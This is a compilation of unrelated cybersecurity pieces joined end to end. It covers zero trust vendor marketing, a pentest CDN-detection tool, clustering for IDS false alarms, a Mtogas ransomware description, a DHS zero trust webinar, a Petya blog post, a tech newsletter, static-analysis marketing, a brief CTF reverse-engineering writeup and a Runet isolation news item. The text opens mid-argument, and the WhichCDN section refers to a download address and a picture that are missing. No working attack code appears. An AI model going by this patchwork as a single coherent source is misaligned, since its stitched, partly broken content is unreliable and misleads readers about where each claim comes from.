Overall, the goal of Zero Trust Architecture is to protect devices and data from malicious actors. It improves on other security models by enforcing more granular access controls, which helps limit the potential for unauthorized access. In Zero Trust Architecture, a trust zone is an area where those granted access are also granted access to other parts of the network. Returning to our airport analogy, everywhere beyond the security gates is a shared trust zone where you can move relatively freely. When you go to board your plane, you must go through another security checkpoint into a smaller trust zone. The smaller a trust zone is, the less data and access to assets it has. This helps to limit the potential damage that a bad actor can cause. If a bad actor gained access to the terminal, they could harm everyone within the secure perimeter of the terminal.
If the bad actor only had access to the plane, the potential harm would be much more limited (the analogy breaks down a little here, because someone with access to a plane would also have had access to the terminal, but you get the picture).

The Core Tenets of Zero Trust Architecture

In order to build a more secure environment while still offering usable services, Zero Trust Architecture focuses on:

- Authorization: Only granting users access to the minimum level of data and services that are required to fulfill their role.
- Authentication: Verifying the identity of authorized users through logins, keys, certificates, multi-factor authentication and other measures. This helps to protect from unauthorized access.
- Limited trust zones: Making trust zones as small as possible to reduce potential impacts if compromised.
- Availability: The above security measures are critical, but they need to be designed in a way that maintains availability. A service is useless if it is incredibly secure, but unavailable much of the time.
- Minimized delays: The vetting processes are important, but authentication should be implemented in a way that doesn't slow down access.

LuxSci and Zero Trust Alignment

LuxSci has long aligned its services with Zero Trust principles. Our Zero Trust-aligned features include:

- Dedicated servers with virtualized sandboxing and dynamic per-customer micro-segmentation. We put each dedicated customer in its own trust zone.
- Dynamic network and user access monitoring that can block suspected threats.
- Granular access controls for users and systems that access customer data.
- Encrypted email.

The Biden Administration's push toward Zero Trust Architecture shows just how critical it is for protection in the current environment. Secure your organization by contacting us now to find out how it can get onboard with LuxSci's Zero Trust-aligned services.
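To make the tenets above concrete, here is a minimal, hypothetical sketch of per-request zero trust evaluation in Python. The users, zones, and policy entries are invented for illustration; this is a toy model of the concept, not any vendor's implementation.

```python
# Hypothetical sketch: every request is authenticated and authorized against
# a deliberately small trust zone; nothing is trusted for being "inside".
from dataclasses import dataclass

@dataclass
class Request:
    user: str
    mfa_passed: bool
    zone: str       # the trust zone the request targets
    action: str

# Minimal least-privilege policy: (user, zone, action) tuples that are allowed.
POLICY = {
    ("alice", "billing-db", "read"),
    ("bob", "web-frontend", "deploy"),
}

def evaluate(req: Request) -> bool:
    if not req.mfa_passed:                              # authentication step
        return False
    return (req.user, req.zone, req.action) in POLICY   # authorization step

print(evaluate(Request("alice", True, "billing-db", "read")))      # True
print(evaluate(Request("alice", True, "web-frontend", "deploy")))  # False: wrong zone
print(evaluate(Request("bob", False, "web-frontend", "deploy")))   # False: no MFA
```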
How to automate CDN detection?

Note: The French version is available here: http://bssiblog.supertag.fr/automatiser-detection-cdns/

As in any pentest, the recon phase is paramount and determines whether an attempt to access the targeted system will be successful. A multitude of tools allow performing port scans, DNS enumeration, CMS detection, and various other types of assessments. However, none of them make it easy to detect whether a given website is protected by a CDN (Content Delivery Network).

CDNs are becoming more and more popular these days and provide features to shield websites against numerous types of attacks, such as:
- Denial of Service
- Distributed Denial of Service
- Distributed Reflection Denial of Service
- XSS and SQLi, through a WAF (Web Application Firewall)

CDNs are a real challenge for penetration testers, since they often hide the target's real address, preventing any further system-based attacks. Detecting them early results in a gain of time by avoiding unnecessary assessments.

WhichCDN has 5 different detection methods:
- Whois detection: CDNs can affect the whois command results by changing several fields, e.g. Name Server, nserver, etc.
- Error server detection: A few CDNs disclose information when one tries to directly access the IP addresses resolved by the host command, exposing themselves to the world.
- HTTP header detection: Some CDNs can be quite intrusive and modify the HTTP headers by adding or replacing existing fields, which allows detecting their presence.
- DNS detection: When resolving the DNS records of a given domain name, it is common to find the name server associated with the CDN in place.
- Subdomain detection: Big companies often use a subdomain to configure their CDN; by trying to access such a subdomain, it is possible to determine which technology is used.

Usage of WhichCDN to detect CDNs

WhichCDN is an extremely simple Python script to use. It is available at the following address:

Once downloaded (with the « git clone » command), WhichCDN can be used as follows:

As can be seen in the picture above, 0x00sec.org is protected by Cloudflare. It is just as simple as that.

At the time of writing, WhichCDN supports the following CDNs:
- Microsoft Azure

Axes of improvement

The state of the art in this domain has not shown that it is possible to bypass such security measures, but if a method is ever disclosed, it would be awesome to add attack vectors to work around those filtering systems. Moreover, it would be relevant to extend the list of supported CDNs with other service providers such as:
- Verizon Digital Media Services

WhichCDN aims to be the indispensable tool in terms of CDN detection, allowing pentesters and security experts to speed up the reconnaissance phase by highlighting whether a given website is protected by a CDN. This valuable information will inexorably avoid wasted time, where every second is precious. It is also worth noting that WhichCDN has been added to BlackArch Linux and, soon, Kali Linux. Happy pentesting.
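For readers who want to see what the HTTP header detection method looks like in practice, here is a minimal Python sketch, independent of WhichCDN itself. Only the Cloudflare signature (the cf-ray header and the "cloudflare" Server value) is asserted here; anything else is reported as a generic hint, and a real tool would carry a much larger signature set.

```python
# Minimal sketch of CDN detection via HTTP response headers.
import urllib.request

def detect_cdn(url: str) -> str:
    with urllib.request.urlopen(url, timeout=10) as resp:
        headers = {k.lower(): v.lower() for k, v in resp.headers.items()}
    # Cloudflare is easy: it adds cf-ray and identifies itself in Server.
    if "cf-ray" in headers or "cloudflare" in headers.get("server", ""):
        return "cloudflare"
    # Many other CDNs and proxies identify themselves in Server or Via.
    for field in ("server", "via"):
        if field in headers:
            return f"unrecognized, but {field} header present: {headers[field]}"
    return "no CDN signature found"

print(detect_cdn("https://www.cloudflare.com"))  # expected: cloudflare
```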
Machine Learning False Alarm Rate Reduction

In some cases, IDS/IPS systems may classify an event correctly or falsely. Classified events are evaluated in four categories in the literature:

- True Positives (TP): intrusive and anomalous,
- True Negatives (TN): not intrusive and not anomalous,
- False Positives (FP): not intrusive but anomalous,
- False Negatives (FN): intrusive but not anomalous.

TP and TN represent correctly classified events; FP and FN represent wrongly classified events. Recognizing FN events (intrusive but not anomalous) is a very hard task that cannot be done by the system itself; the human factor must be involved in the mechanism for recognizing this type of event. An FP (not intrusive but anomalous) is an event classified as intrusive that is actually a normal user's event. This is a very common occurrence in today's systems.

False alarm rate reduction is one of the most challenging problems, especially for IDS/IPS systems used for commercial purposes. In general, to reduce the false alarm rate, an extra module (also known as a filter) must be implemented before the IDS/IPS output is reported. In this way, false alarms are eliminated from the output, and the network administrator only has to handle the small number of alarms that may represent real intrusion attempts. Thus, time and manpower are saved. In this chapter, we explain how the filter module works and how it reduces false alarms.

The majority of researchers have provided solutions to alarm correlation for anomaly techniques, since purely anomaly-based techniques trigger more alarms than other techniques. Although the hybrid approach optimizes the visibility and performance of the system, it makes alarm correlation more complicated. There is a need to attract researchers' attention to providing alarm management solutions for the hybrid detection methods in recent use.

There are two main assumptions for anomaly-based IDSs: the first is that intrusion events exhibit anomalous behavior, and the second is that a user's profile does not change much in a short amount of time. False alarms occur when the edges of these assumptions are not well defined.

Basically, the output of an IDS/IPS consists of two classes of events: attack events that are classified correctly, and normal events that are falsely classified as attacks. In reality, both attack events and normal events consist of many classes, but since we want to separate them into a real alarm class and a false alarm class, we treat the output data as containing two classes. Now we have the output data, and we do not know which alarms are real and which are not. In machine learning terminology, this means the data has no labels. Because of this, we can use unsupervised techniques (also known as clustering techniques) to create two clusters for our purpose. Many algorithms have been developed for clustering. In general, clustering algorithms use distance metrics to evaluate the similarity between samples; every sample is clustered with similar samples, so every cluster contains samples that are similar to each other. With this idea, after the algorithm runs, we have two classes of alarm data: one represents normal events, the other represents attack events. Based on the two main assumptions explained above, we can infer that the smaller cluster represents attack events.
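A minimal sketch of this two-cluster idea follows, assuming scikit-learn is available. The alarm features are synthetic; a real filter module would extract features from actual alarm records (ports, rates, signatures, time of day, and so on).

```python
# Sketch: cluster alarms into two groups and infer that the smaller group
# contains the real attacks, per the assumptions discussed above.
import numpy as np
from sklearn.cluster import KMeans

rng = np.random.default_rng(0)
# Many similar "normal" alarms plus a small, distinct group of real attacks.
false_alarms = rng.normal(loc=[0, 0], scale=0.5, size=(95, 2))
real_alarms = rng.normal(loc=[4, 4], scale=0.5, size=(5, 2))
alarms = np.vstack([false_alarms, real_alarms])

labels = KMeans(n_clusters=2, n_init=10, random_state=0).fit_predict(alarms)

# The smaller cluster is inferred to be the set of real attack events.
small = 0 if (labels == 0).sum() < (labels == 1).sum() else 1
print(f"{(labels == small).sum()} alarms flagged as likely real intrusions")
```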
The approach explained in this chapter is a basic-level one; it is presented to give a good understanding of the methodology. Many different, more complex, and more successful approaches have been developed in the literature. In recent studies, researchers have used combinations of more than one technique, instead of a single algorithm, to reduce the false alarm rate. For example, in two-layered clustering, the first layer separates suspicious events from non-suspicious events, and the second layer gives the final decision for the clusters. Many hybrid approaches like this have been developed in the literature.
The activity of the threat actors behind the STOP Ransomware project is not dying down, and they continue to release countless new variants that are spread via various means. The purpose of the Mtogas Ransomware, one of the recent STOP Ransomware variants, is to encrypt the majority of the victim's files and then extort them by offering to supply a data decryption solution. The removal of the Mtogas Ransomware is a simple task, but doing it once the ransomware has done its job will not change much; the damage done to the file system will persist even if the source of the issue is removed. Unfortunately, the only way to undo the damage done by the Mtogas Ransomware is to run a decryption tool configured with the unique decryption key that was generated during the attack. That key piece of information is stored on the attackers' server, and they are only willing to exchange it for money.

The Mtogas Ransomware's Authors Want a Hefty Payment for a Decryptor

The Mtogas Ransomware marks the victim's files by adding the '.mtogas' extension to their names; files that were not encrypted will not carry this modification. Furthermore, victims of the Mtogas Ransomware will also notice the file '_readme.txt,' another product of the ransomware attack. It contains instructions on how to contact the perpetrators ([email protected] and [email protected]) and an offer to purchase a decryptor. The con artists want to be paid in Bitcoin, so they also include instructions on how to exchange money for Bitcoin. We advise you to stay away from the attackers' offer, since paying them is not a good idea; you may get tricked, and you will not be able to take your money back. Instead, you should use an anti-virus tool to eliminate the harmful application and then look into data recovery options that do not involve cooperating with cybercriminals.
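For responders assessing the scope of an infection, a small, hypothetical triage sketch follows. It only enumerates files carrying the '.mtogas' extension and locates ransom notes; it identifies the damage, it does not (and cannot) decrypt anything.

```python
# Sketch: inventory the damage left by this variant on a volume.
from pathlib import Path

def triage(root: str):
    encrypted, notes = [], []
    for p in Path(root).rglob("*"):
        if p.is_file():
            if p.suffix == ".mtogas":      # extension appended by the ransomware
                encrypted.append(p)
            elif p.name == "_readme.txt":  # the dropped ransom note
                notes.append(p)
    return encrypted, notes

enc, notes = triage("/home")  # point at the affected volume
print(f"{len(enc)} encrypted files, {len(notes)} ransom notes found")
```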
Date: On demand
Duration: 1 hour
Cost: No Fee

The Homeland Security Department is taking steps to address ever-changing cybersecurity threats and challenges through a zero trust architecture. But there is not just one approach to ZTA; rather, each component is taking a slightly different path to reach the same goal across the entire agency.

DHS is in a distinctive position when it comes to cybersecurity: it is both the chef and the diner. Through the Cybersecurity and Infrastructure Security Agency (CISA), DHS provides guidance, technical support and coordination across the government. And the components must implement what CISA and others ask of them, and they are, perhaps, held to a higher standard given that they sit within DHS.

The continuous diagnostics and mitigation (CDM) program is a perfect example of this. While CISA put similar agencies into groups, DHS was its own group, meaning it was charged with implementing CDM tools and capabilities ahead of most agencies. In fact, agencies and CISA are close to completing the baselines for asset management and identity and access management, which are foundational pieces of a zero trust architecture, for all civilian agencies.

The CDM effort is but one example of how agencies have been moving toward the zero trust concept for some time. And to be clear, zero trust is not a technology or a tool, but a concept and framework that helps agencies, and really all organizations, protect systems and data. It moves the protections to the edge, with the device and the user, instead of the perimeter of a data center.

Shane Barney, the chief information security officer for U.S. Citizenship and Immigration Services (USCIS) within DHS, said his agency started the move to zero trust more than five years ago, about the same time it started moving to the cloud. That has led USCIS to lean on identity and access management capabilities to manage role-based access for about 97% of all applications.

"We had a lot of these foundational pieces in place, and it became very evident that the zero trust model and architecture was really what we need to have, especially given the cloud technologies and especially on the development front and the areas we are moving into. We started with some base level assumptions. We went in with the idea that everything is dynamic in our environment, especially in cloud, and the idea here is to permit the least amount of privileges possible, but still be able to accomplish the task or job at hand, and watch and verify everything. Those were sort of our baselines," Barney said during the discussion Strategies for a Zero Trust Architecture, sponsored by Splunk. "Now, of course, we set up an official zero trust work group. But really, we want to take more of an agile approach to it from a security perspective, which means we start small, we fail early and fail often, because that's part of the process. But we fail forward and we do it again: repeat, learn, repeat, rinse and do it again. We started out with tiny projects on which we'd be employing the zero trust principles."

Barney said agencies need to think about what zero trust means; he said it is actually about asset trust.

John Samios, the chief systems security officer for the Transportation Security Administration (TSA) in DHS, said his agency is working across the five pillars of CISA's zero trust maturity model: identity, devices, network, application and data.

"What we're trying to do initially is get corporate buy-in.
We've started an integrated product team (IPT) across all of TSA to make sure everybody really understands the scope of what we're trying to do and what goals we're trying to achieve. Then we can set milestones and set metrics so that we can actually say, 'we have successfully reached this bar, let's go to the next gate,'" Samios said. "I think we're making some good progress in developing that, and then from that, we come up with our plan and try to come up with timeframes for when we can reach these things."

The IPT includes the CXO community as well as program managers, business owners and system owners, Samios said.

Craig Wilson, the director of identity, credential and access management at the Federal Emergency Management Agency (FEMA) in DHS, said his agency is moving its identity and access management system to the cloud as part of its cyber and IT modernization effort. The FEMA enterprise cloud authentication bridging services (FECABS) is a software-as-a-service implementation that should be ready by the end of fiscal 2024.

"We already know what the state of play for the RADIUS migration is. We have systems that we've already made some minor modifications to, and systems that have challenges," he said. "We're going to focus on those systems that are ready upfront, and then by that time, the others should be ready to go and we bring them in there."

Bill Wright, the senior director of North American government affairs at Splunk, said that as each agency advances down the zero trust path, it should keep in mind that the real tenet of all cybersecurity is trust, so agencies need the ability to identify all of their assets and then assess their trustworthiness across that ecosystem.

"In a zero trust environment, there's a real need to have that granular, continuous visibility into every component, including real-time risk scores and the infrastructure. Then, more importantly, the context to evaluate the trustworthiness of every device and user, and ensure every network flow is authenticated and authorized," he said. "The policies need to be dynamic and calculated from as many sources of data as possible. Those are the real challenges, I think, in pulling together all of these tools: getting the most out of that data that's coming in."

This program is sponsored by Splunk.

Speakers:
Shane Barney, Chief Information Security Officer, U.S. Citizenship and Immigration Services
John Samios, Chief Systems Security Officer, Transportation Security Administration
Craig Wilson, Director, Identity Credential and Access Management, Federal Emergency Management Agency
Bill Wright, Senior Director, North American Government Affairs, Splunk
I've been blogging about WannaCry recently; my last post was all about the question, "Why was this allowed to happen?" As I stated then, Microsoft did indeed release Bulletin MS17-010 and a patch in March for the SMBv1 vulnerability that was ultimately exploited by the WannaCry attack. Presumably, every concerned system administrator patched all their servers.

But there's a new twist in the delivery system. The new Petya ransomware uses the same vulnerability as WannaCry to infect systems, but uses a new vector, PsExec, to move from a system where it gains administrative rights to other systems. Example: even if a server is patched, if the system administrator's laptop becomes infected with Petya ransomware, the malware can use those admin credentials to jump around the network to the servers. How? Petya finds passwords by extracting them from memory or the local filesystem on the infected laptop, and uses them to move to other systems. Administrator rights allow the upload of the malicious files by helping them masquerade as legitimate file uploads. A similar "alternative" attack vector was documented in use by NotPetya, which spreads using the Windows Management Instrumentation (WMI) tooling. So there are two possible attack vectors to examine as you defend your ecosystem.

The MSRT tool, with all the latest updates, can help Windows users remove the software; this, of course, depends on the tool already being loaded and kept updated on the system. For users who are locked out due to full encryption, it is less useful.

It's not enough to just patch the servers controlled directly by the system administrators on a (hopefully) centralized patching system. The latest vectors of Petya and NotPetya are clear indicators that endpoints matter just as much. If a PC or application stores a username and password in plain text anywhere in the system or its logs, there exists the possibility for malware to find it.

Again, as previously, I encourage everyone to test their code and applications for Abuse of Functionality vulnerabilities and for unsanitized inputs, so that even a trusted user (like the admin) will not be able to upload infected files behind the scenes. Additionally, make sure that all applications keep their user and password lists in encrypted files. It's not just your websites that are in danger; internal applications are an issue as well. ERP systems, payroll systems, anything with an application interface can be vulnerable to an infected administrator's laptop and enable the spread. Patch early, and test all your applications to protect against Petya ransomware.
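As a starting point for the plain-text-password audit suggested above, here is a minimal Python sketch. The regular expression and file suffixes are illustrative assumptions and will produce false positives; treat hits as leads to review, not verdicts.

```python
# Sketch: scan logs and config files for credential-looking plaintext.
import re
from pathlib import Path

CRED_PATTERN = re.compile(r"(password|passwd|pwd)\s*[=:]\s*\S+", re.IGNORECASE)

def scan(root: str, suffixes=(".log", ".txt", ".cfg", ".ini")):
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix in suffixes:
            try:
                for i, line in enumerate(p.read_text(errors="ignore").splitlines(), 1):
                    if CRED_PATTERN.search(line):
                        print(f"{p}:{i}: {line.strip()[:80]}")
            except OSError:
                pass  # unreadable file; skip it

scan("/var/log")  # or an application's configuration directory
```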
Discover more from hrbrmstr's Daily Drop

Warpgate; Submillimeter-scale multimaterial terrestrial robots; Terraforming Mars (FOSS)

A less code-heavy edition today to give y'all a break from the usual walls of code.

Perhaps the most ubiquitous cybersecurity problem in any organization (outside of not patching installed software) is the lack of something called "network segmentation". MITRE ATT&CK (a globally accessible knowledge base of defender resources, including adversary tactics and techniques based on real-world observations) defines it this way (where the above link goes):

Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.

"DMZ" is "demilitarized zone" (a sizable chunk of cyber folk like to think they're soldiers fighting wars for some daft reason); VPCs are just logically isolated virtual networks.

In "flat" (i.e., non-segmented) internal networks, every compute resource is available in user space, including administrative interfaces. In organizations' cloud computing environments, non-segmented networks mean that services like databases and middleware APIs (along with administrative interfaces) are all laid bare on the hostile internet. Organizations tend to have these flat networks and/or fully public cloud networks because it's "easier". It is absolutely also easier for attacks, like ransomware campaigns, to succeed in these types of environments.

When networks are segmented, or isolated from each other, one does need a way to reach them to get work done. There are multiple ways to enable this access, a popular one being the use of a bastion host (another, sigh, military term usurped by digital warriors), which is nothing more than a server whose purpose is to provide access to a private network from an external network.

Warpgate is a Rust-based SSH and HTTPS bastion host that runs on Linux. For SSH use, Warpgate receives SSH connections with specifically formatted credentials, authenticates the user locally, connects to the target itself, and then connects both parties together while (optionally) recording the session. This is somewhat different from traditional SSH bastion hosts known as "jump hosts", where you SSH to the bastion, then SSH to the target system from said bastion. When connecting through HTTPS, Warpgate presents a selection of available targets and will then proxy all traffic in a session to the selected target. You can switch between targets at any time. It has a simple (deliberate use of that word vs my usual "straightforward") setup process, a single binary, and supports multifactor authentication. The documentation is great, which means I can leave you in the capable hands of the developers vs make you read even more walls of text here.

Submillimeter-scale multimaterial terrestrial robots

This section title is also the title of a paper by a group of Northwestern University researchers. Here's the abstract:

Robots with submillimeter dimensions are of interest for applications that range from tools for minimally invasive surgical procedures in clinical medicine to vehicles for manipulating cells/tissues in biology research.
The limited classes of structures and materials that can be used in such robots, however, create challenges in achieving desired performance parameters and modes of operation. Here, we introduce approaches in manufacturing and actuation that address these constraints to enable untethered, terrestrial robots with complex, three-dimensional (3D) geometries and heterogeneous material construction. The manufacturing procedure exploits controlled mechanical buckling to create 3D multimaterial structures in layouts that range from arrays of filaments and origami constructs to biomimetic configurations and others. A balance of forces associated with a one-way shape memory alloy and the elastic resilience of an encapsulating shell provides the basis for reversible deformations of these structures. Modes of locomotion and manipulation span from bending, twisting, and expansion upon global heating to linear/curvilinear crawling, walking, turning, and jumping upon laser-induced local thermal actuation. Photonic structures such as retroreflectors and colorimetric sensing materials support simple forms of wireless monitoring and localization. These collective advances in materials, manufacturing, actuation, and sensing add to a growing body of capabilities in this emerging field of technology.

Northwestern University engineers have developed the smallest-ever remote-controlled walking robot, and it comes in the form of a tiny, adorable peekytoe crab. Just a half-millimeter wide, the tiny crabs can bend, twist, crawl, walk, turn and even jump. The researchers also developed millimeter-sized robots resembling inchworms, crickets and beetles. Although the research is exploratory at this point, the researchers believe their technology might bring the field closer to realizing micro-sized robots that can perform practical tasks inside tightly confined spaces.

Smaller than a flea, the crab is not powered by complex hardware, hydraulics or electricity. Instead, its power lies within the elastic resilience of its body. To construct the robot, the researchers used a shape-memory alloy material that transforms to its "remembered" shape when heated. In this case, the researchers used a scanned laser beam to rapidly heat the robot at different targeted locations across its body. A thin coating of glass elastically returns the corresponding part of the structure to its deformed shape upon cooling.

It's super neat, and (IMO) super creepy tech that will be the stuff of nightmares for many days/weeks/years to come (how long before these are used to kill people or invade privacy?). Northwestern also has a video that I'll leave you with to explore further.

Terraforming Mars (FOSS)

FryxGames' Terraforming Mars (TM) is a great board game. This is how they introduce it:

The taming of the Red Planet has begun! Corporations are competing to transform Mars into a habitable planet by spending vast resources and using innovative technology to raise the temperature, create a breathable atmosphere, and make oceans of water. As terraforming progresses, more and more people will immigrate from Earth to live on the Red Planet.

In Terraforming Mars, you control a corporation with a certain profile. Play project cards, build up production, place your cities and green areas on the map, and race for milestones and awards! Will your corporation lead the way into humanity's new era?

TM has replaced Catan as the default "family game" at home, and there are official digital versions of it that you can play in solo mode or online with others.
If you're already familiar with TM or want to explore the game for the first time, you can also do so for free! A group of developers has built a FOSS (GPLv3) version that you can run on your own (it's pretty straightforward) or play right now on their Heroku instance.

Go forth and make Mars great again!

Does anyone have the over/under on the final UK government resignation count? That's got to be some good action, unless Sky News is right. (In other news, Haass sure was right back in 2017 about the declining global order. It's a great book if you need some beach/cottage/camping reading.) ☮
Security researchers, code analysts, and security consultants analyze third-party source code, which may already be running in production environments, for security threats. Their goal is to quickly discover security vulnerabilities, determine if and how these are exploitable, and what kind of risk they pose to the infrastructure. RIPS significantly speeds up the workflow of security professionals by automating the precise vulnerability identification process and by minimizing the risk of overlooking dangerous code in large code bases. The interactive vulnerability dashboard makes it possible to quickly evaluate findings and to summarize detected issues for the final analysis report.

Developers of PHP applications extend existing frameworks and write new source code from scratch. Their goal is to find a reasonable tradeoff between building and shipping new applications fast and implementing the right security mechanisms to protect their sensitive data, servers, and reputation. Hence, vulnerability detection must be very fast, and the process of understanding and fixing issues must be even faster. RIPS is the fastest static code analysis tool available. Detected issues can be reviewed in real time, and a scan finishes within minutes. Detailed instructions make it easy to prioritize and understand all findings, so that the most critical issues can be patched first. Our API allows an automated security analysis to be integrated seamlessly into the development lifecycle.

Web hosters, network operators, and administrators face the big challenge of running multiple web applications, sometimes with source code of unknown origin. At the same time, reliable protection of the infrastructure must be maintained and the attack surface kept small. A security analysis of thousands of installations must run fast, requires a powerful automation process, and must produce a high-level overview of the security state of all installations. With the help of a powerful API, our fast and precise security analysis can be fully automated, scheduled, and integrated into risk management. Operators can be alerted when vulnerable code is added, and actions can be taken for websites with a critical security status.
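To illustrate the general source-to-sink idea behind static analysis (and only the idea; RIPS performs real data-flow analysis across files and statements, not line matching), here is a deliberately naive Python sketch that flags PHP lines where user-controlled input appears in the same statement as a dangerous function.

```python
# Naive source-to-sink matcher for PHP, for illustration only. A real static
# analyzer tracks taint through variables, functions, and files; this regex
# pass only catches the most direct one-line cases.
import re
import sys

SOURCES = r"\$_(GET|POST|REQUEST|COOKIE)"
SINKS = r"(mysql_query|mysqli_query|eval|system|exec|include|require)"
RULE = re.compile(rf"{SINKS}\s*\(.*{SOURCES}", re.IGNORECASE)

def scan_php(path: str):
    with open(path, errors="ignore") as f:
        for lineno, line in enumerate(f, 1):
            if RULE.search(line):
                print(f"{path}:{lineno}: possible tainted sink: {line.strip()}")

for php_file in sys.argv[1:]:
    scan_php(php_file)
```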
# VolgaCTF 2020 Qualifier : F-Hash

**category** : reverse
**points** : 250
**solves** : 43

Run the executable. It takes a long time and fails to produce the answer, so I start reversing the binary.

Function 12A0 takes two parameters `a, b` and returns `bitcount(a) + bitcount(b)`.

Function 13B0 is a recursive function and is the main cause of the poor performance. It contains a while loop that repeatedly executes `-=`; it is actually performing a mod operation.

Rewrite the whole function in Python and do the following two things:

1. Don't use recursion; cache the answers.
2. Turn the repeated subtraction into a modulus operation.

Finally, replace the right value in gdb and continue running. The output will be the flag.
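Since this writeup does not reproduce the binary's exact recurrence, the sketch below uses a hypothetical Fibonacci-like stand-in just to show both fixes: memoization instead of blind recursion, and a single modulus instead of the subtraction loop. The modulus constant is a placeholder.

```python
# Both optimizations from the writeup, on a stand-in recurrence.
from functools import lru_cache

M = 1_000_000_007  # placeholder; the binary's own constant would go here

@lru_cache(maxsize=None)   # fix 1: cache answers instead of recursing blindly
def f(n: int) -> int:
    if n < 2:
        return n
    # fix 2: the binary's  while (x >= M) x -= M;  loop is just  x % M.
    return (f(n - 1) + f(n - 2)) % M

print(f(500))  # instant with caching; naive recursion would never finish
```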
Roskomnadzor has published a draft of the order that describes the rules for isolating the Runet "in the event of threats". In such a case, a centralized management regime will begin to operate, implemented by the agency. Sending traffic outside Russia will be prohibited.

The Russian segment of the Internet can go offline when the following threats occur:

— a threat to integrity: when it is impossible to establish a connection between users;
— a threat to stability: disruption of the network in case of equipment failure or natural and man-made disasters;
— a threat to operational safety: attempts to hack providers' equipment, or a destabilizing external or internal informational influence exerted on the network.

As we can see, the description of the threats does not directly affect the cryptocurrency market, but at the same time the wording is rather vague, which means that no project is immune to the isolation of the Internet.